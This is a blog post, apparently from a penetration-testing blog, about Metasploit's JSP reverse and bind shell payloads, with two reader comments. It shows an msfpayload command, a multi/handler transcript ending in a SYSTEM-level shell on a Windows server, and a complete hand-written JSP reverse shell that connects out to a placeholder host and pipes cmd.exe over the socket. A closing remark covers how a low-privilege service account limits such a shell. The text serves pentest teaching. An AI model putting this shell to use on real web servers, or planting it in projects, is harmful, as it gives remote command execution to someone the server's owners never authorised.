Thursday, October 22, 2009

Metasploit JSP Shells

Stephen Fewer has pushed up a JSP reverse shell and a JSP bind shell (java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp).

I'm not sure of all the ways to use them yet, but the easiest is to have msfpayload emit the shell as raw output (R) and upload the resulting .jsp to a web server that will execute it. For an example of using one from inside an exploit module, check out the Adobe RoboHelp exploit.

yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST= R > blah.jsp

From there, start a multi/handler for the same payload, browse to webpath/blah.jsp on the target server, and catch your shell. Two things to keep in mind: the target has to be a servlet container (Tomcat, JBoss, etc.) that actually compiles and runs .jsp files, otherwise the server just hands the file back as text or a download; and the SHELL option defaults to cmd.exe, so for a Unix target set SHELL to /bin/sh before you generate the payload.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole

       =[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
       =[ 222 aux

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 

msf exploit(handler) > info

       Name: Generic Payload Handler
    Version: 6558
   Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:

Available targets:
  Id  Name
  --  ----
  0   Wildcard Target

Payload information:
  Space: 100000
  Avoid: 0 characters

  This module is a stub that provides all of the features of the
  Metasploit payload system to exploits that have been launched
  outside of the framework.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local address
   LPORT  4444             yes       The local port
   SHELL  cmd.exe          yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( -> 

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

nt authority\system

[*] Command shell session 1 closed.
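For anyone who wants to see what the generated blah.jsp is actually doing once the servlet container compiles it, here is a stripped-down JSP reverse shell written for this page as an illustration. It is not Stephen Fewer's payload or any other Metasploit code; the lhost, lport and shell values are hard-coded placeholders (192.0.2.10, 4444, cmd.exe) standing in for what msfpayload bakes in from LHOST, LPORT and SHELL, and the Pump class name is mine. The three payload options in the show options output above map directly onto the three variables at the top of the scriptlet.

```jsp
<%@ page import="java.io.*,java.net.*" %>
<%!
    // Copies bytes from in to out until EOF or an I/O error, then exits.
    // Daemon thread so the container is not held open once the session ends.
    static class Pump extends Thread {
        private final InputStream in;
        private final OutputStream out;

        Pump(InputStream in, OutputStream out) {
            this.in = in;
            this.out = out;
            setDaemon(true);
        }

        public void run() {
            byte[] buf = new byte[4096];
            int n;
            try {
                while ((n = in.read(buf)) != -1) {
                    out.write(buf, 0, n);
                    out.flush();
                }
            } catch (IOException e) {
                // peer or shell process went away; let the thread end
            }
        }
    }
%>
<%
    // Placeholder values standing in for what msfpayload bakes in from
    // LHOST / LPORT / SHELL. 192.0.2.10 is a TEST-NET address, not a real host.
    String lhost = "192.0.2.10";
    int    lport = 4444;
    String shell = "cmd.exe";          // use "/bin/sh" for a Unix target

    // Connect back to the multi/handler first, then spawn the system shell.
    Socket  sock = new Socket(lhost, lport);
    Process proc = Runtime.getRuntime().exec(shell);

    // Shell stdout and stderr go to the socket; bytes from the socket go to shell stdin.
    new Pump(proc.getInputStream(), sock.getOutputStream()).start();
    new Pump(proc.getErrorStream(), sock.getOutputStream()).start();
    new Pump(sock.getInputStream(), proc.getOutputStream()).start();

    // Nothing is written to the HTTP response; the shell lives on in the daemon threads.
%>
```

Serve this through a servlet container, start the handler exactly as in the transcript above, and request the page once. Because the shell process is spawned by the container, the session runs as whatever account the container service runs under; that is why the transcript above lands in nt authority\system without any privilege escalation, and why a hardened deployment that runs the container as a low-privilege service account limits what a shell like this can do.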


Fukad said...

Hi! I just have to say great work on this blog! This is the first time I've had some problems getting this to work. I start the payload and the multi handler and upload the blah.jsp to my web server. But when I try to connect with my "victim" machine to
"webserver/blah.jsp" I only get the "download window" opened, or in Firefox I get the source code to the .jsp.

What am I doing wrong? Should I make a <script language="javaScript">(blah.jsp) source code</script>? Or what? Keep up the good work, Peace

CG said...

Does the web server know how to handle .jsp pages?